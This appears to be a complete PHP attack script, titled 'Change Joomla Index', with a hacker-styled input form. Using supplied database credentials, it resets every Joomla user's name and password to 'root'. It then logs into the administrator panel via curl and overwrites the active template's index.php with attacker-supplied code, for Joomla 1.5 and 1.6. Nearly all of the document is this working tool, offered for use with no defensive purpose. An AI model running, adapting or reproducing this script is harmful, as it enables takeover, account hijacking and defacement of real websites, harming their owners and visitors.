Change Joomla Index

1. <link href='http://fonts.googleapis.com/css?family=Orbitron:700' rel='stylesheet' type='text/css'>
2. <style type="text/css">
3. body {
4. background:
5. url("http://i.imgur.com/hg21xZ9.png") repeat ,
6. url("http://www.desktopas.com/files/2012/11/18/blue-and-black-abstract-1600x900.jpg") no-repeat center top,top left,top right;
7. background-color: #000000;
8. </style>
9. <font face='Orbitron'>
10. <?php
11. ###########################################
12. #      Change Joomla Index                #
13. #      Coded By RAB3OUN                   #
14. #          [email protected]              #
15. #     http://www.rab3oun.net/         #
16. ###########################################
17.  
18. if ($_POST['form_action'])
19. {
20.  
21. $h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['code']))))."'))); exit; ?>";
22.  
23.  $dbprefix=($_POST['db_prefix']);
24.  $username=($_POST['db_username']);
25.  $password=($_POST['db_password']);
26.  $dbname=($_POST['db_name']);
27.   $site_url=($_POST['site_url']);
28.  
29. $co=randomt();
30.  
31.  
32.  
33.       $link=mysql_connect("localhost",$username,$password) ;
34.  
35.          mysql_select_db($dbname,$link) ;
36.  
37. $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='root' , password = '63a9f0ea7bb98050796b649e85481845'");
38. echo("<br>[+] Changing root password to root");
39.          
40.          $req =mysql_query("SELECT * from  `".$dbprefix."extensions` ");
41.          
42. if ( $req )
43. {
44. #################################################################
45. ######################        V1.6         ######################
46. #################################################################
47.  
48.        
49. $req =mysql_query("SELECT * from  `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
50.      $data = mysql_fetch_array($req);
51. $template_name=$data["template"];
52.  
53. $req =mysql_query("SELECT * from  `".$dbprefix."extensions` WHERE name='".$template_name."'");
54.      $data = mysql_fetch_array($req);
55. $template_id=$data["extension_id"];
56.  
57. $url2=$site_url."/index.php";
58.  
59. $ch = curl_init();
60. curl_setopt($ch, CURLOPT_URL, $url2);
61. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
62. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
63. curl_setopt($ch, CURLOPT_HEADER, 1);
64. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
65.     curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
66.     curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
67.  
68.  
69. $buffer = curl_exec($ch);
70.  
71. $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
72. $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
73.  
74. ///////////////////////////
75. $url2=$site_url."/index.php";
76. $ch = curl_init();
77. curl_setopt($ch, CURLOPT_URL, $url2);
78. curl_setopt($ch, CURLOPT_POST, 1);
79. curl_setopt($ch, CURLOPT_POSTFIELDS,"username=root&passwd=root&option=com_login&task=login&return=".$return."&".$hidden."=1");
80. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
81. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
82. curl_setopt($ch, CURLOPT_HEADER, 0);
83. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
84. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
85. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
86. $buffer = curl_exec($ch);
87.  
88. $pos = strpos($buffer,"com_config");
89. if($pos === false) {
90. echo("<br>[-] Login Error");
91. exit;
92. }
93. else {
94. echo("<br>[+] Login Successful");
95. }
96. ///////////////////////////
97. $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
98. $ch = curl_init();
99. curl_setopt($ch, CURLOPT_URL, $url2);
100. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
101. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
102. curl_setopt($ch, CURLOPT_HEADER, 0);
103. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
104. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
105. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
106. $buffer = curl_exec($ch);
107.  
108. $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
109. if($hidden2) {
110. echo("<br>[+] index.php file founded in Theme Editor");
111. }
112. else {
113. echo("<br>[-] index.php Not found in Theme Editor");
114. exit;
115. }
116. echo("<br>[*] Updating Index.php .....");
117. $url2=$site_url."/index.php?option=com_templates&layout=edit";
118.  
119. $ch = curl_init();
120. curl_setopt($ch, CURLOPT_URL, $url2);
121. curl_setopt($ch, CURLOPT_POST, 1);
122. curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
123.  
124. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
125. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
126. curl_setopt($ch, CURLOPT_HEADER, 0);
127. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
128. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
129. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
130. $buffer = curl_exec($ch);
131.  
132. $pos = strpos($buffer,'<dd class="message message">');
133. if($pos === false) {
134. echo("<br>[-] Updating Index.php Error");
135. exit;
136. }
137. else {
138. echo("<br>[+] Index.php successfully saved");
139. }
140. #################################################################
141. ######################      V1.6  END      ######################
142. #################################################################
143.  
144.  
145. }
146. else
147. {
148.  
149. #################################################################
150. ######################      V1.5           ######################
151. #################################################################
152.          
153. $req =mysql_query("SELECT * from  `".$dbprefix."templates_menu` WHERE client_id='0'");
154.      $data = mysql_fetch_array($req);
155. $template_name=$data["template"];
156.  
157. $url2=$site_url."/index.php";
158. $ch = curl_init();
159. curl_setopt($ch, CURLOPT_URL, $url2);
160. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
161. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
162. curl_setopt($ch, CURLOPT_HEADER, 1);
163. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
164.     curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
165.     curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
166. $buffer = curl_exec($ch);
167.  
168. $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
169.  
170. $url2=$site_url."/index.php";
171. $ch = curl_init();
172. curl_setopt($ch, CURLOPT_URL, $url2);
173. curl_setopt($ch, CURLOPT_POST, 1);
174. curl_setopt($ch, CURLOPT_POSTFIELDS,"username=root&passwd=root&option=com_login&task=login&".$hidden."=1");
175. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
176. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
177. curl_setopt($ch, CURLOPT_HEADER, 0);
178. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
179. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
180. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
181. $buffer = curl_exec($ch);
182.  
183. $pos = strpos($buffer,"com_config");
184.  
185. if($pos === false) {
186. echo("<br>[-] Login Error");
187. exit;
188. }
189. else {
190. echo("<br>[+] Login Successful");
191. }
192. ///////////////////////////
193. $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
194. $ch = curl_init();
195. curl_setopt($ch, CURLOPT_URL, $url2);
196. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
197. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
198. curl_setopt($ch, CURLOPT_HEADER, 0);
199. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
200.     curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
201.     curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
202. $buffer = curl_exec($ch);
203.  
204. $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
205.  
206. if($hidden2) {
207. echo("<br>[+] index.php file founded in Theme Editor");
208. }
209. else {
210. echo("<br>[-] index.php Not found in Theme Editor");
211. }
212.  
213. echo("<br>[*] Updating Index.php .....");
214. $url2=$site_url."/index.php?option=com_templates&layout=edit";
215. $ch = curl_init();
216. curl_setopt($ch, CURLOPT_URL, $url2);
217. curl_setopt($ch, CURLOPT_POST, 1);
218. curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
219. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
220. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
221. curl_setopt($ch, CURLOPT_HEADER, 0);
222. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
223.     curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
224.     curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
225. $buffer = curl_exec($ch);
226.  
227. $pos = strpos($buffer,'<dd class="message message fade">');
228. if($pos === false) {
229. echo("<br>[-] Updating Index.php Error");
230. exit;
231. }
232. else {
233. echo("<br>[+] Index.php successfully saved");
234. }
235. #################################################################
236. ######################      V1.5  END      ######################
237. #################################################################
238.  
239. }
240.  
241. }
242.  
243.  
244. function randomt() {
245.  
246.     $chars = "abcdefghijkmnopqrstuvwxyz023456789";
247.     srand((double)microtime()*1000000);
248.     $i = 0;
249.     $pass = '' ;
250.  
251.     while ($i <= 7) {
252.         $num = rand() % 33;
253.         $tmp = substr($chars, $num, 1);
254.         $pass = $pass . $tmp;
255.         $i++;
256.     }
257.  
258.     return $pass;
259.  
260. }
261.  
262. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)
263.  
264. {
265.  
266. $ar0=explode($marqueurDebutLien, $text);
267. $ar1=explode($marqueurFinLien, $ar0[$i]);
268. $ar=trim($ar1[0]);
269. return $ar;
270. }
271. echo "
272. \n";
273. echo "<title>root .-.</title>
274. \n";
275. echo " <style>
276. \n";
277. echo "
278. \n";
279. echo "BODY { SCROLLBAR-BASE-COLOR: #191919; SCROLLBAR-ARROW-COLOR: olive;   color: white;}
280. \n";
281. echo "textarea{background-color:#191919;color:red;font-weight:bold;font-size: 12px;font-family: Orbitron; border: 1px solid #666666;}
282. \n";
283. echo "input{FONT-WEIGHT:normal;background-color: #191919;font-size: 13px;font-weight:bold;color: red; font-family: Orbitron; border: 1px solid #666666;height:17}
284. \n";
285. echo "</style>
286. \n";
287. echo "<center>
288. \n";
289. echo "<font color=\"#FFFF6FF\" size='+3' face='Orbitron'>[ ~~ Change Joomla Index ~~ ]</font><br><br>
290. \n";
291. echo "<FORM action=\"\"  method=\"post\">
292. \n";
293. echo "<input type=\"hidden\" name=\"form_action\" value=\"2\">
294. \n";
295. echo "<br>
296. \n";
297. echo "<table border=1>
298. \n";
299. echo "
300. \n";
301. echo "<tr><td>db_prefix </td><td><input type=\"text\" size=\"30\" name=\"db_prefix\" value=\"jos_\"></td></tr>
302. \n";
303. echo "<tr><td>db_username </td><td><input type=\"text\" size=\"30\" name=\"db_username\" value=\"\"></td></tr>
304. \n";
305. echo "<tr><td>db_password</td><td><input type=\"text\" size=\"30\" name=\"db_password\" value=\"\"></td></tr>
306. \n";
307. echo "<tr><td>db_name</td><td><input type=\"text\" size=\"30\" name=\"db_name\" value=\"\"></td></tr>
308. \n";
309. echo "<tr><td>Admin Control panel url</td><td><input type=\"text\" size=\"60\" name=\"site_url\" value=\"http://site.com/administrator/\"></td></tr>
310. \n";
311. echo "
312. \n";
313. echo "</table>
314. \n";
315. echo "<br>
316. \n";
317. echo "<br>
318. \n";
319. echo "<TEXTAREA rows=\"18\"  cols=\"50\" name=\"code\"></TEXTAREA>
320. \n";
321. echo "  <br>
322. \n";
323. echo "<INPUT class=submit type=\"submit\" value=\"Submit\" name=\"Submit\">
324. \n";
325. echo "</FORM>
326. \n";
327. ?>